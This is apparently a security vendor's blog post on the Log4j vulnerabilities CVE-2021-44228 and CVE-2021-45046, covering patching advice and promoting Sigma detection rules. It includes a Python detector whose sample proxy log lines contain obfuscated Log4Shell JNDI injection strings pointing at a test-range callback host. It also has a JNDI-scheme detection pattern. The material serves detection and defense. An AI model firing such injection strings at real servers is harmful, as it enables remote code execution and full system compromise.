Yet another splitting headache for SOC teams: beware of the newest Log4j vulnerability, CVE-2021-45046! The cybersecurity world is still reeling from a surge of exploitation attempts against CVE-2021-44228, the critical zero-day in the Apache Log4j Java logging library, and now a second Log4j flaw, tracked as CVE-2021-45046, has arrived on the scene.
CVE-2021-45046 was disclosed on December 14, just days after Log4j 2.15.0 shipped as the fix for CVE-2021-44228, and is addressed in Log4j 2.16.0. It initially received a CVSS score of 3.7 as a denial-of-service issue; once it became clear that the incomplete 2.15.0 fix still allowed remote code execution in certain non-default configurations, the rating was raised to Critical with a score of 9.0. According to the Apache Software Foundation advisory, the newly disclosed vulnerability affects all Log4j versions from 2.0-beta9 through 2.15.0, excluding 2.12.2.
The original flaw, CVE-2021-44228, known as Log4Shell (also LogJam), is an unauthenticated remote code execution issue enabling full system compromise. It is extremely easy to exploit, and with multiple PoCs circulating online it has become a trivial matter for adversaries: a single crafted string in any logged field lets attackers execute code remotely and gain full control over the affected server.
CVE-2021-44228 analysis shows that all systems running Log4j 2.0-beta9 through 2.14.1 are vulnerable. Moreover, because the issue affects the default configuration of many Apache projects, including Apache Struts2, Apache Solr, Apache Druid, and Apache Flink, a wide range of software and web apps used by both enterprises and individual users is exposed to attack.
Alibaba Cloud's security team first spotted the vulnerability and reported it to Apache in late November 2021. Notably, it was initially identified on Minecraft-related servers, where adversaries attempted to execute malicious code on clients running the Java version of the extremely popular game. After the root cause was traced to Log4j, exploit code samples promptly started to appear online.
Currently, security experts are reporting Internet-wide scans for vulnerable systems, and CERT NZ has warned of multiple in-the-wild exploitations.
All users running a vulnerable version of Log4j should upgrade to Log4j 2.16.0 (or 2.12.2 on Java 7) as soon as possible; the earlier 2.15.0 release turned out to be an incomplete fix. Organizations are also encouraged to monitor for any malicious activity associated with CVE-2021-44228 and to look for anomalies that would indicate they have already been compromised. To enable timely attack detection, the SOC Prime Team has created a batch of dedicated Sigma rules. Security professionals can download the rules from SOC Prime's Detection as Code platform.
This detection has translations for the following SIEM, EDR & XDR platforms: Microsoft Sentinel, Elastic Stack, Splunk, Humio, Sumo Logic, ArcSight, QRadar, FireEye, LogPoint, Graylog, Regex Grep, RSA NetWitness, Apache Kafka ksqlDB, Securonix, and Open Distro.
The rule is aligned with the latest MITRE ATT&CK® framework (v10), addressing the Initial Access tactic with Exploit Public-Facing Application (T1190) as the main technique.
To help organizations stay constantly alert, the SOC Prime Team has recently released the latest Sigma-based rule to detect potential exploitation attempts of CVE-2021-44228. This rule detects possible Log4j exploitation patterns in proxy logs, as well as the download of a malicious class file that spawns a reverse bash shell.
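The catch with pattern-matching these attacks in proxy logs is that the `${jndi:...}` string rarely arrives in plain form: attackers nest `${lower:j}`-style lookups, use the `${name:-default}` fallback syntax (`${::-j}`) and URL-encode the whole thing. The following Python is an added example, not SOC Prime's Sigma content and not part of the original post. It normalizes a log line by URL-decoding it and folding those lookups from the inside out, then matches the resulting `${jndi:<scheme>://...}` against a list of JNDI schemes. The sample log lines, hosts and IP addresses (RFC 5737 test ranges) are constructed for the example.

```python
import re
from urllib.parse import unquote

# Innermost ${...} lookup: a body that contains no further braces.
_INNER = re.compile(r"\$\{([^{}]*)\}")
# JNDI URI schemes Log4j's JndiLookup hands to javax.naming. The match runs on
# the normalised text, so obfuscated variants collapse onto this one pattern.
_JNDI = re.compile(
    r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nds|https?)\s*:\s*//\s*([^}\s\"]*)",
    re.IGNORECASE,
)

# Constructed proxy log lines (RFC 5737 test addresses); not real traffic.
SAMPLE_LOG_LINES = [
    '203.0.113.5 - - [10/Dec/2021:14:03:22 +0000] "GET / HTTP/1.1" 200 612 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '203.0.113.5 - - [10/Dec/2021:14:03:25 +0000] "GET /login HTTP/1.1" 200 1024 "-" "${${lower:j}ndi:${lower:r}mi://198.51.100.7:1099/obj}"',
    '203.0.113.9 - - [11/Dec/2021:02:17:40 +0000] "GET /api HTTP/1.1" 404 153 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://198.51.100.7/x}"',
    '203.0.113.9 - - [11/Dec/2021:02:17:41 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F198.51.100.7%2Fa%7D HTTP/1.1" 200 88 "-" "curl/7.79.1"',
    '203.0.113.12 - - [12/Dec/2021:09:00:01 +0000] "GET / HTTP/1.1" 200 612 "-" "${${env:NaN:-j}ndi:dns://198.51.100.7/ping}"',
    '198.51.100.20 - - [12/Dec/2021:09:00:05 +0000] "GET /docs/jndi-tutorial.html HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
    '198.51.100.21 - - [12/Dec/2021:09:00:07 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
]


def _fold(body):
    """Evaluate one lookup used for obfuscation; None means leave it in place."""
    m = re.match(r"(lower|upper):(.*)$", body, re.IGNORECASE | re.DOTALL)
    if m:
        return m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper()
    # ${name:-default} evaluates to the default when the lookup fails, so
    # ${::-j} and ${env:NOPE:-j} both become "j". A real jndi: body is kept.
    if ":-" in body and not body.lower().startswith("jndi"):
        return body.split(":-", 1)[1]
    return None


def normalize(text, max_passes=16):
    """URL-decode (repeatedly) and fold nested lookups until nothing changes."""
    for _ in range(max_passes):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    for _ in range(max_passes):
        changed = False

        def replace(m):
            nonlocal changed
            folded = _fold(m.group(1))
            if folded is None:
                return m.group(0)
            changed = True
            return folded

        text = _INNER.sub(replace, text)
        if not changed:
            break
    return text


def detect(line):
    """Return scheme/target of a JNDI lookup in the line, or None if clean."""
    norm = normalize(line)
    m = _JNDI.search(norm)
    if m is None:
        return None
    return {"protocol": m.group(1).lower(), "target": m.group(2), "indicator": m.group(0)}


def scan(lines):
    hits = []
    for number, line in enumerate(lines, start=1):
        hit = detect(line)
        if hit:
            hit["line"] = number
            hits.append(hit)
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG_LINES):
        print(f"line {hit['line']}: {hit['protocol']} -> {hit['target']}")
```

A rule that only looks for the literal `${jndi:` catches the first sample line and misses the next four; either normalize before matching, as above, or make sure the rule enumerates the `${lower:`, `${upper:`, `:-` and percent-encoded variants. The folded-down indicator is also the value worth carrying into the alert, since it names the callback host the attacker expects the victim to contact.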
All users on Java 8 or later should update to Log4j 2.16.0, since the mitigations in Apache Log4j 2.15.0 turned out to be incomplete; users still on Java 7 should move to 2.12.2. Note that the earlier advice to set log4j2.formatMsgNoLookups=true does not protect against CVE-2021-45046 in the affected non-default configurations, so where an upgrade is not immediately possible the Apache advisory recommends removing the JndiLookup class from the classpath (for example, zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class). To help organizations detect CVE-2021-45046 and minimize the risk of exploitation attempts, the SOC Prime Team has recently released a dedicated Sigma-based rule that identifies Log4j exploitation patterns and log entries in any available log files.
Sign up for free at SOC Prime’s Detection as Code platform to detect the latest threats in your security environment, improve your log source and MITRE ATT&CK coverage, and enhance your organization’s ROI for cybersecurity. Security experts can also join our Threat Bounty Program to monetize their own detection content.